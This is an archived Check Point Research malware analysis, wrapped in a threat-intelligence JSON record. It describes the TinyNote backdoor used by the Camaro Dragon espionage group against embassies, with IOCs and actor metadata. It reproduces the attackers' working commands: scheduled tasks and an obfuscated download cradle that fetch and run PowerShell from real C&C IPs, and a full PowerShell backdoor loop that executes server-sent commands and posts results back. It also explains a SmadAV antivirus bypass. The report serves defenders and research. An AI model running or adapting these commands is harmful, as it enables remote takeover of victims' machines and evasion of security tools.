{ "id": "2e2698d6-2ec0-4c29-9bd4-0f235d249a5b", "created_at": "2026-04-06T03:37:12.502473Z", "updated_at": "2026-04-10T03:36:33.937217Z", "deleted_at": null, "sha1_hash": "60d3c7bb3a48469b0dfee6ab60478d55b5aee52f", "title": "Malware Spotlight: Camaro Dragon’s TinyNote Backdoor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 99484, "plain_text": "Malware Spotlight: Camaro Dragon’s TinyNote Backdoor\r\nBy etal\r\nPublished: 2023-06-01 · Archived: 2026-04-06 03:25:42 UTC\r\nExecutive summary\r\nSince early January 2023, there has been a notable surge in activity targeting European foreign affairs entities\r\nlinked to Southeast and East Asia. The threat actors responsible are tracked by Check Point Research as Camaro\r\nDragon and are associated with a broad network of espionage operations aligned with Chinese interests. Camaro\r\nDragon overlaps with previously reported activities conducted by state-sponsored Chinese threat actors, namely\r\nMustang Panda. A portion of the group’s attack toolset and underlying infrastructure was thoroughly described by\r\nfellow ESET researchers in their detailed technical paper on the MQsTTang backdoor. Check Point Research\r\nanalysis of these attacks also has uncovered a malicious TP-Link router firmware containing a custom implant\r\nnamed Horse Shell, which allows the threat actors to maintain persistent access and build anonymous\r\ninfrastructure using compromised routers.\r\nIn this report, we analyze another previously undisclosed backdoor associated with this cluster of activity which\r\nshares with it not only a common infrastructure but also the same high-level intelligence-gathering goal.\r\nKey findings:\r\nA previously unknown Go-based backdoor called TinyNote was found on one of the Camaro Dragon\r\ndistribution servers, in addition to being spotted in the wild. The malware samples also communicate with\r\nother known C\u0026C servers attributed to Camaro Dragon.\r\nThe TinyNote backdoor is distributed with names related to foreign affairs matters, and likely targets\r\nSoutheast and East Asian embassies.\r\nThe backdoor performs a bypass of the Indonesian antivirus SmadAV, a security tool popular in Southeast\r\nAsian countries, such as Myanmar and Indonesia, and apparently used by a subset of the campaign targets.\r\nThe TinyNote backdoor is a first-stage malware only capable of basic machine enumeration and command\r\nexecution via PowerShell or Goroutines. However, it focuses on redundancy to gain a foothold on the\r\ninfected machine, including setting up multiple persistency tasks, communication with several different\r\nC\u0026C servers, and different types of C\u0026C command execution.\r\nIntroduction\r\nWhen we investigated a few delivery servers related to Camaro Dragon, we discovered that one of them exposed\r\nthe threat actors’ tools and files located on the server, only protected by basic HTTP Authorization with a known\r\npassword. Among many other tools, previously discussed by other researchers, we discovered yet another\r\nbackdoor that we named TinyNote. Interestingly, the folder with the backdoor contained two other\r\ntools: Autoruns by Sysinternals, and HRSWord, which is a part of the Chinese Huorong Network Technology\r\nprotection suite, and is often used by various actors to disable endpoint protection tools.\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 1 of 10\n\nThe backdoor we found on the server, and its versions found in the wild, are executables with names related to\r\nforeign affairs, such as  PDF_ Contacts List Of Invitated Deplomatic Members  and  Note_Documents_No.14-\r\nTokyo-__From___Embassy___of___Russia_ . This naming convention is similar to the one used at the same time by\r\nthe MQsTTang backdoor versions discovered by ESET and found in VT. Similar to MQsTTang, the TinyNote\r\nbackdoor samples also contain folder icon in an attempt to deceive victims about their real purpose.\r\nThe custom backdoor is written in the Go programming language. In the copyright and build information for the\r\nexecutables, the malware developers left a reference to  code.mil.mm , the Myanmar military infrastructure, likely\r\nto add credibility to their tool. The actors’ heightened interest in Myanmar entities and successful attacks carried\r\nout against them were previously discussed thoroughly. Our examination of the infrastructure led us to other\r\nfindings that indicate the actors’ interest in Taiwan’s government entities as well.\r\nThe TinyNote backdoor is a basic remote shell, limited in capabilities: it enables the actors to fingerprint the\r\ninfected machine, set up persistence, and establish two different ways to execute commands received from the\r\nC\u0026C server. Despite its simplicity, it employs an interesting method of bypassing a very specific antivirus\r\nsolution, suggesting the actors had issues gaining a foothold in specific environments.\r\nSmadAV evasion\r\nAt the beginning of its execution, the malware starts a function called  bypassSMADAV , whose purpose is to bypass\r\nthe Indonesian antivirus Smadav. The developers of the antivirus position their solution as a “second-layer\r\nantivirus” with “active users mostly from Indonesia, and other users mostly come from Southeast Asia and Africa\r\nCountries”. The existence of the code that handles this specific antivirus once again confirms the focused targeting\r\nof Camaro Dragon campaigns and their knowledge of their victims’ environments and solutions. It’s worth\r\nmentioning that in previous operations, the actors used SmadAV for their own purposes, forcing its component\r\nSmadAVprotect32.exe to side-load their malicious DLL.\r\nWhen any new process starts in the system, SmadAV scans all available windows. For every problematic window\r\nfound, the antivirus checks if the window is visible with the API function  IsWindowVisible . If the window is\r\nvisible, it adds this window owner’s process ID to an array containing all current processes that have at least one\r\nvisible window:\r\nFigure 1 - SmadAV code that collects a list of PIDs that have associated windows.\r\nFigure 1 – SmadAV code that collects a list of PIDs that have associated windows.\r\nAfter iterating over all windows, the antivirus process iterates over this array and compares each process ID to the\r\nnewly created process ID. If none is found, meaning the new process doesn’t have any visible windows, the\r\nantivirus deems the newly created process to be malicious and shows a popup that suggests blocking the created\r\nprocess. This flow might act as protection from the techniques like process hollowing where the process is created\r\nin suspend mode and then replaced with malicious code.\r\nThe threat actors appear to have reverse-engineered the logic of smadAV and dealt with this check by creating a\r\nwindow without a window name, but with the class name “EDIT” which is one of the available default\r\nwindows class names. The window attributes include a very large number for the X position, the width and height\r\nare set to 0, and flags such as  WS_EX_TOOLWINDOW  define the window as a tool window. These attributes make sure\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 2 of 10\n\nthe window is identified as visible by  IsWindowVisible  function, but in fact, it is not shown to the user and does\r\nnot appear in the taskbar or when pressing ALT+TAB:\r\nFigure 2 - A piece of malware code created a specially crafted window to bypass the smadAV.\r\nFigure 2 – A piece of malware code creates a specially crafted window to bypass the smadAV.\r\nBefore a call to  CreateWindowEx , you would usually first need to create a class by calling  RegisterClass  and\r\nthen class  CreateWindowEx . But in this case, the threat actors decided to use a default class name which allows\r\nthem to skip calling the  RegisterClass  function prior to calling  CreateWindow . Ultimately, creating this\r\nwindow allows the threat actors to bypass the check, as the newly created window is technically visible, and\r\ncontinue the backdoor execution uninterrupted.\r\nFigure 3 - SmadAV detection on the Go backdoor with the removed bypassSMADAV function.\r\nFigure 3 – SmadAV detection on the Go backdoor with the removed bypassSMADAV function.\r\nBackdoor execution flow\r\nThe malware creates a mutex named  NASA\u0026USA  and then continues execution according to one of two modes of\r\noperation.\r\nFirst mode: persistence, PowerShell backdoor, and malware “installation”\r\nThe malware checks if there is a  “zip”  string in the file path. If this is not found, it continues the execution flow.\r\nFirst, it creates the directory  c:\\programdata\\Robots . If this fails, the malware does not continue the execution,\r\nlikely because the infected user only has low privileges.\r\nNext, the malware creates 2 scheduled tasks called  test  and  test2  to retrieve and execute PowerShell\r\ncommands, each retrieved from  robots.txt  from different C\u0026C servers, most likely to eliminate a single point\r\nof failure:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nschtasks /Create /TN test /SC MINUTE /MO 15 /TR \"powershell \\\"$r=\r\n[System.Net.WebRequest]::Create(\\\\\\\"http://5.188.33.190/Robots.txt\\\\\\\");(new-object\r\nSystem.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -\r\nnoprofile -\\\"\" /f\r\nschtasks /Create /TN test /SC MINUTE /MO 15 /TR \"powershell \\\"$r=\r\n[System.Net.WebRequest]::Create(\\\\\\\"http://5.188.33.190/Robots.txt\\\\\\\");(new-object\r\nSystem.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -\r\nnoprofile -\\\"\" /f\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 3 of 10\n\nschtasks /Create /TN test /SC MINUTE /MO 15 /TR \"powershell \\\"$r=[System.Net.WebRequest]::C\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nschtasks /Create /TN test2 /SC MINUTE /MO 45 /TR \"powershell \\\"$r=\r\n[System.Net.WebRequest]::Create(\\\\\\\"http://103.159.132.91/Robots.txt\\\\\\\");(new-object\r\nSystem.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -\r\nnoprofile -\\\"\" /f\r\nschtasks /Create /TN test2 /SC MINUTE /MO 45 /TR \"powershell \\\"$r=\r\n[System.Net.WebRequest]::Create(\\\\\\\"http://103.159.132.91/Robots.txt\\\\\\\");(new-object\r\nSystem.IO.StreamReader(($r.GetResponse()).GetResponseStream())).ReadToEnd() | powershell.exe -\r\nnoprofile -\\\"\" /f\r\nschtasks /Create /TN test2 /SC MINUTE /MO 45 /TR \"powershell \\\"$r=[System.Net.WebRequest]::\r\nAt the time of execution, both servers returned the same code pointing to the third server:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nC:\\Windows\\System32\\cmd.exe /c \"start powershell.exe -nop -c set-alias exi iex;`$v1='iex (new-object\r\nnet.webclient).dow';`$v2='nloadstring(''http://';`$v3='103.159.132.91/robots1.txt'')';exi(`$v1+`$v2+`$v3);\"\r\nC:\\Windows\\System32\\cmd.exe /c \"start powershell.exe -nop -c set-alias exi iex;`$v1='iex (new-object\r\nnet.webclient).dow';`$v2='nloadstring(''http://';`$v3='103.159.132.91/robots1.txt'')';exi(`$v1+`$v2+`$v3);\"\r\nC:\\Windows\\System32\\cmd.exe /c \"start powershell.exe -nop -c set-alias exi iex;`$v1='iex (n\r\nThe final payload returned is a lightweight PowerShell backdoor, which retrieves a list of commands from\r\nthe  CMD  header from the C\u0026C server response, executes them with  Invoke-Expression , concatenates the\r\noutputs with  '_n1w_'  string, and sends them back to the server in POST request:\r\nPlain text\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 4 of 10\n\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n$WindowState = '[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int\r\nstat);';add-type -name win -member $WindowState -namespace native;\r\n[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);\r\n$url=\"http://103.159.132.91:8081/\";\r\n$postParams = 'result=start';\r\nwhile (1 -eq 1) {\r\ntry {\r\n$data = [System.Text.Encoding]::UTF8.GetBytes($postParams);\r\n$req = [System.Net.WebRequest]::Create($url);\r\n$req.ServicePoint.ConnectionLimit =65535;\r\nIf ($req.ServicePoint.CurrentConnections -ge 10000) {\r\n$req.ServicePoint.CloseConnectionGroup(\"\")\r\n}\r\n$req.ServicePoint.Expect100Continue = $false;\r\n#$req.Timeout = 10000;\r\n$req.Method = \"POST\";\r\n$req.ContentType = \"application/x-www-form-urlencoded\";\r\n$req.ContentLength = $data.Length;\r\n$Stream = $req.GetRequestStream();\r\n$Stream.Write($data, 0, $data.Length);$Stream.Flush();$Stream.Close();\r\n#waiting remote\r\n[System.Net.WebResponse] $resp = $req.GetResponse();$header=$resp.GetResponseHeader('CMD');\r\n$d = [System.Convert]::FromBase64String($header);\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 5 of 10\n\n$Ds = [System.Text.Encoding]::UTF8.GetString($d);$result = \"\";\r\nForeach ($string in invoke-expression $Ds){$result=$result+'_n1w_'+$string;};\r\n$result = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($result));\r\n$postParams = \"result=$result\";\r\n}\r\ncatch{};\r\n};\r\n$WindowState = '[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int\r\nstat);';add-type -name win -member $WindowState -namespace native;\r\n[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); $url=\"http://103.159.132.91:8081/\"; $postParams = 'result=start';\r\nwhile (1 -eq 1) { try { $data = [System.Text.Encoding]::UTF8.GetBytes($postParams); $req =\r\n[System.Net.WebRequest]::Create($url); $req.ServicePoint.ConnectionLimit =65535; If\r\n($req.ServicePoint.CurrentConnections -ge 10000) { $req.ServicePoint.CloseConnectionGroup(\"\") }\r\n$req.ServicePoint.Expect100Continue = $false; #$req.Timeout = 10000; $req.Method = \"POST\";\r\n$req.ContentType = \"application/x-www-form-urlencoded\"; $req.ContentLength = $data.Length;\r\n$Stream = $req.GetRequestStream(); $Stream.Write($data, 0,\r\n$data.Length);$Stream.Flush();$Stream.Close(); #waiting remote [System.Net.WebResponse] $resp =\r\n$req.GetResponse();$header=$resp.GetResponseHeader('CMD'); $d =\r\n[System.Convert]::FromBase64String($header); $Ds =\r\n[System.Text.Encoding]::UTF8.GetString($d);$result = \"\"; Foreach ($string in invoke-expression $Ds)\r\n{$result=$result+'_n1w_'+$string;}; $result =\r\n[Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($result)); $postParams =\r\n\"result=$result\"; } catch{}; };\r\n$WindowState = '[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle,\r\n$url=\"http://103.159.132.91:8081/\";\r\n$postParams = 'result=start';\r\nwhile (1 -eq 1) {\r\ntry {\r\n $data = [System.Text.Encoding]::UTF8.GetBytes($postParams);\r\n $req = [System.Net.WebRequest]::Create($url);\r\n $req.ServicePoint.ConnectionLimit =65535;\r\n If ($req.ServicePoint.CurrentConnections -ge 10000) {\r\n $req.ServicePoint.CloseConnectionGroup(\"\")\r\n }\r\n $req.ServicePoint.Expect100Continue = $false;\r\n #$req.Timeout = 10000;\r\n $req.Method = \"POST\";\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 6 of 10\n\n$req.ContentType = \"application/x-www-form-urlencoded\";\r\n $req.ContentLength = $data.Length;\r\n $Stream = $req.GetRequestStream();\r\n $Stream.Write($data, 0, $data.Length);$Stream.Flush();$Stream.Close();\r\n #waiting remote\r\n [System.Net.WebResponse] $resp = $req.GetResponse();$header=$resp.GetResponseHeader('CM\r\n $d = [System.Convert]::FromBase64String($header);\r\n $Ds = [System.Text.Encoding]::UTF8.GetString($d);$result = \"\";\r\n Foreach ($string in invoke-expression $Ds){$result=$result+'_n1w_'+$string;};\r\n $result = [Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($result));\r\n $postParams = \"result=$result\";\r\n}\r\ncatch{};\r\n};\r\nThe malware then copies itself to the zip file with the name  [16 random\r\ncharacters].zip  in  c:\\users\\public\\ , and also creates another copy of itself to the path using the zip name as\r\na folder, for example,  c:\\users\\public\\pMiOxI3G44Igrpq7.zip\\ . Both the file inside the zip and the unzipped\r\ncopy of the file get the same randomly generated name  [5 random characters].exe , for example,  8q3Fj.exe .\r\nFinally, the malware creates a scheduled task to execute its copy from this randomized path:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nschtasks /Create /TN 8NaZrCq3pGeDRXKF /SC MINUTE /MO 15 /TR \"explorer.exe\r\nc:\\users\\public\\8NaZrCq3pGeDRXKF.zip\\8NaZr.exe\" /f\r\nschtasks /Create /TN 8NaZrCq3pGeDRXKF /SC MINUTE /MO 15 /TR \"explorer.exe\r\nc:\\users\\public\\8NaZrCq3pGeDRXKF.zip\\8NaZr.exe\" /f\r\nschtasks /Create /TN 8NaZrCq3pGeDRXKF /SC MINUTE /MO 15 /TR \"explorer.exe c:\\users\\public\\8\r\nSecond mode: the backdoor\r\nThis mode happens after the malware has achieved persistence and is running from a “zip” path. First, the\r\nmalware enumerates the system for the following data and concatenates it to one string:\r\nThe current system username\r\nThe current username home folder\r\nThe system’s network interfaces (name, MacAddress, description)\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 7 of 10\n\nNext, it encrypts the string using a simple XOR encryption algorithm with the key  NASA  and Base64 encodes it\r\nafterward. It then picks one random C\u0026C URL out of the three available and constructs a GET request:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttp://5.188.33.190/api.php\r\nhttp://103.169.90.132/api.php\r\nhttp://103.159.132.91/api.php\r\nhttp://5.188.33.190/api.php http://103.169.90.132/api.php http://103.159.132.91/api.php\r\nhttp://5.188.33.190/api.php\r\nhttp://103.169.90.132/api.php\r\nhttp://103.159.132.91/api.php\r\nThe encoded enumeration data is stored in a cookie called  SSN . Other headers in the request are constructed from\r\nserval random values. The  hostname  header is selected from the following list:\r\nwww.google.com\r\nwww.facebook.com\r\nwww.gstatic.com\r\ntwitter.com\r\nThe  user-agent  is also randomized and is selected from the following list:\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0\r\nMozilla/5.0 (iPhone; CPU iPhone OS 12_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like\r\nGecko) Version/12.0 Mobile/15E148 Safari/604.1\r\nMozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0\r\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/104.0.0.0 Safari/537.36\r\nThe expected result from the server is a JSON with the following structure:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 8 of 10\n\nEnlighterJS 3 Syntax Highlighter\r\n{\"msg\":\"[BASE64-ENCODED COMMAND]\"}\r\n{\"msg\":\"[BASE64-ENCODED COMMAND]\"}\r\n{\"msg\":\"[BASE64-ENCODED COMMAND]\"}\r\nAfter the validation of the JSON and Base64 decoding, the malware creates a Goroutine that executes the\r\ncommand and continues to listen for more commands in a loop.\r\nAttribution\r\nIn addition to the fact that one of the backdoor versions was found on the Camaro Dragon distribution server,\r\nthere are other strong connections between the actors and the TinyNote malware:\r\nThe server 103.159.132[.]91, where one of the versions of the malware was first found behaves like the\r\nC\u0026C server of the backdoor, and was also a delivery server for the MQsTTang backdoor during the same\r\ntime period.\r\nAnother C\u0026C server, 103.169.90[.]132, is known to be used by the threat actors continuously.\r\nThe victimology and lures are consistent with the latest Camaro Dragon campaigns, including the activity\r\nassociated with the MQsTTang backdoor. In addition, the actors also keep using a “folder” icon and a\r\nspecific naming convention for some of their backdoors seen since early 2023.\r\nThe third C\u0026C server, 5.188.33[.]190, has rather unique SSL certificates with Alternative\r\nnames  mail.mofa.gov.tw ,  intra.mofa.gov.tw , and  *.mofa.gov.tw . Another server with the same certificate,\r\n23.106.123[.]59 is currently redirecting to the official infrastructure of the government of Taiwan, but likely was\r\nused for the additional attacks by the threat actor.\r\nConclusion\r\nThe TinyNote backdoor highlights the targeted approach of Camaro Dragon and the extensive research they\r\nconduct prior to infiltrating their intended victims’ systems. Although the backdoor is not technically complex, it\r\nemploys several noteworthy tactics to establish an initial foothold in the compromised systems. These include the\r\nutilization of Golang, a programming language rarely used in Camaro Dragon tools, minimal lightweight\r\nfunctionality, and embedded bypass of a specific antivirus software commonly installed on potential targets. The\r\nsimultaneous use of this backdoor together with other tools with different levels of technical advancement implies\r\nthat the threat actors are actively seeking to diversify their attack arsenal.\r\nIOCs\r\nPlain text\r\nCopy to clipboard\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 9 of 10\n\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nf0b081ca58b6c253aa0014847c62dbad\r\n6a2204b32a60aed0a3403c63ad2a529c\r\n5.188.33[.]190\r\n103.169.90[.]132\r\n103.159.132[.]91\r\n23.106.123[.]59\r\nf0b081ca58b6c253aa0014847c62dbad 6a2204b32a60aed0a3403c63ad2a529c 5.188.33[.]190 103.169.90[.]132\r\n103.159.132[.]91 23.106.123[.]59\r\nf0b081ca58b6c253aa0014847c62dbad\r\n6a2204b32a60aed0a3403c63ad2a529c\r\n5.188.33[.]190\r\n103.169.90[.]132\r\n103.159.132[.]91\r\n23.106.123[.]59\r\nCheck Point Customers remain protected:\r\nThreat Emulation provides comprehensive coverage of attack tactics, file types, and operating systems, powered\r\nby ThreatCloud AI – the brain behind all of Check Point’s Security.\r\nSource: https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/" ], "report_names": [ "malware-spotlight-camaro-dragons-tinynote-backdoor" ], "threat_actors": [ { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479", "created_at": "2023-10-27T02:00:07.764261Z", "updated_at": "2026-04-10T02:00:03.378226Z", "deleted_at": null, "main_name": "Camaro Dragon", "aliases": [], "source_name": "MISPGALAXY:Camaro Dragon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775446632, "ts_updated_at": 1775792193, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/60d3c7bb3a48469b0dfee6ab60478d55b5aee52f.pdf", "text": "https://archive.orkl.eu/60d3c7bb3a48469b0dfee6ab60478d55b5aee52f.txt", "img": "https://archive.orkl.eu/60d3c7bb3a48469b0dfee6ab60478d55b5aee52f.jpg" } }